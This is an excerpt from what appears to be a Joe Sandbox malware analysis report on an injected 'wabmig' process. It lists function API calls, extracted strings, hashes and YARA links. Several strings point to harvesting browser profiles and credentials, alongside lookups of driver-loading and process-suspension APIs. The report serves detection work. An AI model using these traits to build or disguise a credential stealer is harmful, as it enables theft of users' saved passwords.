                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                                            • GetLastError.KERNEL32 ref: 00409974
                                                                            • CloseClipboard.USER32 ref: 0040997D
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                            • String ID:
                                                                            • API String ID: 3604893535-0
                                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                            Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                            • API String ID: 2780580303-317687271
                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                            Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EmptyClipboard.USER32 ref: 00409882
                                                                            • wcslen.MSVCRT ref: 0040988F
                                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                            • CloseClipboard.USER32 ref: 004098D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                            • String ID:
                                                                            • API String ID: 1213725291-0
                                                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                            Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                            • free.MSVCRT ref: 00418370
                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,774CDF80,?,0041755F,?), ref: 00417452
                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                            • String ID: OsError 0x%x (%u)
                                                                            • API String ID: 2360000266-2664311388
                                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                            Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1865533344-0
                                                                            • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                            • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                            Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                            Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                            • memset.MSVCRT ref: 0040265F
                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                            • API String ID: 577499730-1134094380
                                                                            • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                            • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                            Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                            • String ID: :stringdata$ftp://$http://$https://
                                                                            • API String ID: 2787044678-1921111777
                                                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                            Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                            • GetDC.USER32 ref: 004140E3
                                                                            • wcslen.MSVCRT ref: 00414123
                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                            • String ID: %s:$EDIT$STATIC
                                                                            • API String ID: 2080319088-3046471546
                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                            Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                            • memset.MSVCRT ref: 00413292
                                                                            • memset.MSVCRT ref: 004132B4
                                                                            • memset.MSVCRT ref: 004132CD
                                                                            • memset.MSVCRT ref: 004132E1
                                                                            • memset.MSVCRT ref: 004132FB
                                                                            • memset.MSVCRT ref: 00413310
                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                            • memset.MSVCRT ref: 004133C0
                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                            Strings
                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                            • {Unknown}, xrefs: 004132A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                            • API String ID: 4111938811-1819279800
                                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                            Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                            • String ID:
                                                                            • API String ID: 829165378-0
                                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                            Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                            • memset.MSVCRT ref: 00404200
                                                                            • memset.MSVCRT ref: 00404215
                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 0040426E
                                                                            • memset.MSVCRT ref: 004042CD
                                                                            • memset.MSVCRT ref: 004042E2
                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                            • API String ID: 2454223109-1580313836
                                                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                            Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                            • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                            • API String ID: 4054529287-3175352466
                                                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                            Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                            • API String ID: 3143752011-1996832678
                                                                            • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                            • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                            Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                            • API String ID: 667068680-2887671607
                                                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                            Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
